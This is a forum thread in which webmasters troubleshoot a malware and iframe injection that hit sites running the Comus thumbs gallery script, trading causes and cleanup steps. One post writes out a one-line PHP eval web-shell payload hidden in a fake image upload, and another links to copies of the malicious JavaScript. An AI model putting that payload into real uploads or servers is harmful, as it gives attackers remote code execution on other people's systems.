|
Got hacked! Help!
Some of my sites that using TGPX, TEVS and Comus thumbs are getting malware injection attack. One of my dedicated servers got hit by malware distributer.
Below code is injected right after the body tag of html, tmpl and some php files. Quote:
But they are constantly adding this JS code even if I removed it... Since the box is unmanagged, Maybe I will have to reload server OS and restore whole files from backup. but I'm worry about the backup is infected as well.. :Oh crap Beware guys, check your server security, file/dir permission etc. also your PC is not safe as well. Install a good anti-malware and don't save password at your local ftp client. http://www.webhostingtalk.com/showth...rame+injection |
change your index page delete the page having that code, then change all your access
|
Is it this one?
forums.digitalpoint.com/showthread.php?t=901622 |
This is usually caused by a virus on your computer. Have your host check ftp logs, and i bet you will have a bunch of unknown logins. These viruses append this code to any file named index.php index.html etc.
|
i am amazed how much webhosts have easy to hack ftp logins ...
|
If it's not caused by your own computer it may be also be caused from something on your site...
If you have photo uploads... it's possible someone has uploaded a fake image that is actually running code... You may also have your permissions set wrong on the files on your server allowing someone to exploit your box and add things to the content... |
Quote:
Good luck getting that code outta ur sites 2 ... |
Quote:
|
Do yourself a favor and find the security hole before you fix the site.
You need to find how they got in (assuming they hacked your server). |
here's my guide:
step 1: update your adobe reader to latest version (9.xx) or even better remove it and put FoxIt Reader (much smaller and faster). step 2: update flash player plugins for IE and FF step 3: download 2-3 anti-spyware softwares and check your computer step 4: once you are clean login and change all your paswords and fix the sites. step 5: monitor what's going on... - - - - extra steps * Download and use Total Commander 7.5 that has password encryption option that makes your passwords safe (this I haven't found on any other software and that's the weakest point of most of ftp clients) * always have anti-virus, firewall and anti-spyware app active (I use Nod32 Smart Security AV+FW + AdAware) * use only firefox and chrome instead of IE all mentioned software you may find and download at http://www.filehorse.com |
Dude its a comus thumbs issue as far as i'm aware. I'm currently deleting all my comus installs (over 40) and replacing the script with a new one as i have been hit with this hack 3 days ago and still fixing it.
I have used comus for over 5 years and these hacks are all to regular these days, they never update comus and its going to the shit so i would delete it and rebuild site with new script. my 2cents |
Quote:
|
Where you using Filezilla to upload? i know a while back their was a problem with that program letting a virus in to change your .php files
|
Okay a few things here,
what scripts are you running on your server. Are you running joomla? What are the directory permissions of your php files? Hit me up on aim or icq if your host isnt going to fix it for you, as I hate people that hack sites more then anything on the face of the damn planet. |
Quote:
|
Problem solved.
When the script is executed(I visited a infected site accidently yesterday. I guess) it loaded malware which disguised as .pdf or .swf file that steals username/password data from PC.
The malware is hosted at another infected site and loaded via iframe then excuted on the browser. Now the hacker got my site's login and infected my sites too. I don't know how he connected my box though. I guess he's using remote script that doesn't leave log info. Even if I remove those malwares in my PC and change ftp password, the hacker can get my new password easily since I had to load my sites to check. So it is very important that never load the sites during troubleshooting. This is what I did and seems like the code is gone finally. but still monitering.. 1. reboot PC and scan it for spyware. 2. reboot again and change all server passwords. 3. remove the code from all server files(index.html, category.html, index.php, etc..) with serverside text editor. 4. Never load infected webpages on browser during #3. 5. install mod_security and change file permissons. This thing reminds me of BackOrifice at 98'. It's the most annoying fuckware I had ever. it passed mcafee. Remember to use a good antivirus on your PC. I had good result with Malwarebytes.org Thanks for advices. |
and another reason to not use ftp, but sftp....
Quote:
|
Quote:
Yep. looks like Comus is gonna dead soon. lots of security holes and no updates. also going to drop it asap. |
Quote:
most are 644, data/tempates dir and files were set to 777. I changed lots of files to 444 for monitering. will contact you if I get codes again. Thanks! |
this exploit is going around and it seems to be comus is the problem from watching the audit logs and investigating. Even if a server has comus installed unless setup with 1 domain per login etc due to permissions i.e having 777 on things you should not it will infect a whole mess of files and leave backdoors everywhere.
|
Welcome to the club,my one old unsecured machine is also hacked with completely same crap.I working now on removing it.And yes i do have several comus installations there.But i dont see how can comus bug affect all possible sites,no matter are they based on st,tgpx or something else(and i have all three rotator scripts installed)
|
Yep my Comus sites are hacked too for the last couple of days....fucking me off thinking how many will not return cos of warnings thrown up by their anti virus....already had a email from google saying they have tagged my highest traffic site with a "this site could harm your computer" in their search pages...just waiting for more emails from them for my other comus sites! :(
|
Quote:
|
Quote:
|
Quote:
|
Quote:
|
look at all the morons in here
|
heres a quote from my hosts when I told them not to bother scanning my sites as it looks like a comus issue...
"Yes, Comus Thumbs has been causing a lot of issues lately :( " |
Ok so we concluded comus is cause of this?So i can start removing it.
|
Quote:
|
Quote:
It happened when I was on the plane to the Montreal show. That sucked but it was resolved in like 20 mins. after I found it and it was fixed by the programmers and system engineers. |
"But in addition to running an Apache webserver to dish up benign content, they've also been hacked to run a second webserver known as nginx, which serves malware."
Hahhahaha not only does it serve up malware, it serves up malware faster and more efficiently, hhahahah man that really cracks me up in a very geeky way, hahhhaha |
Quote:
The infection did not even take place on any of my office PC's, but in the office a few blocks down the street where the designers and programmers have the office. One guy there had an infected PC that had FTP access to one of my servers. Not sure if they use comus or not but I don't think so. Infection takes place thru adult infected websites in all popular browsers without anti-virus programs seeing it. Hidden custom build (FTP) logs show somebody using my FTP user/pass without brute force entering and adding some files and making some changes similar to all infected victims. |
Quote:
If someone has already hacked your box you have way more issues to worry about... First things first: http://www.rootkit.nl/projects/rootkit_hunter.html Download it, install it, run it, then you can rule out most root kits and learn if your box has been compromised or not... If it has, you know the problem... if it hasn't then you can move onto the next step. GL! |
Actually, old Comus is hackable... These are usually NOT FTP access problems and are problems with PHP scripts being hackable.
|
Quote:
|
Here are copy pastes of java script codes:
http://pastebin.com/m53fc9126 http://pastebin.com/m1b861dd8 |
All My sites were hacked through comus, If you use comus, I advise deleting it and using another script, this appears to be only fix for me :2cents
|
Found this from Webhostingtalk.com
Quote:
Then again, It' not recommended to install unreliable php scripts anyway.. |
Well first thing which i did is to disable completely ftp but that didnt helped anything.Anyway my computer was not compromised since i am not using ftp at all,only sftp.
|
My favorite exploit is the fake image upload that has a correct image header...
If the image gets stored "as is" the first line of it is <?eval($_REQUEST['someVar']?> If the host is configured to parse image files (tracking, dynamic images, etc...) anything they pass in to the request gets evaled... so elegant, so simple, so devastating... |
Anyone heard from Comus regarding this problem? Is a fix being worked on or should I change scripts?
|
i think you might need a managed host.
|
Quote:
ATM this is where we stand, im not saying comus is the prob but it is most likely the cause of all probs. Comus license key admin login page file is broken atm, one of the things that happened to my girlfriend wordpress site during the hacks. tbh with you guys, i myself am ditching comus as my script and am going for an alternative. For now its smart thumbs, and as i got over 100 comus sites i got a long and hard task ahead to switch em all over. Im really hoping that all is well with tony but since i havent heard or seen him online in the past three weeks makes me wonder what the fuck is going on. I hope im not getting loaded with 1000s of messages on my icq... thnx yall, Ed |
Quote:
Duke |
I am not sure how can you be so sure that actually comus is the root of your problems? I am using comus too, but with tightened security on the server itself and with my OS security I never get hacked, neither get into troubles with any of my sites.
This time I haven't been affected by this comus hack (which I think is not comus hack, just a malware insertion) and my sites are running smoothly. The only thing I don't like about comus is that its admin interface loads iframe from their website, so if their website has the malware, then technically every site that runs comus has it too. To get rid of malwares and to actually avoid getting them, just install normal os, like Linux, or buy Mac. Oh, and just one remark: before doing anything on your own, have host run clamAV on your box/v. acc. and scan for potential infected files, as well as run the rootkit detection tools. Then it's your turn to make your own box clean and more secure. Good luck! |
Quote:
|
Look at your .htaccess and check if it's everything working nicely.
|
ive had this before!!
Webair reverted my sites abck before the infection and changed all ftp info |
Old thread. Yes I was wrong. it's a Comus thumbs hack. No ftp password issue.
I misunderstood it was another iframe injection attack that caused from viruses on local machine. I installed mod_security then it stopped code injection but I thought it fixed by removing viruses on my PC. Anyway it's completely fixed by removing all backdoor scripts and infected files. If anyone still faces this froblem, refer this thread. http://www.gfy.com/fucking-around-and-business-discussion/928915-secure-delete-comus-installation-html-php-files-server-infected.html |
| All times are GMT -7. The time now is 04:29 PM. |
Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc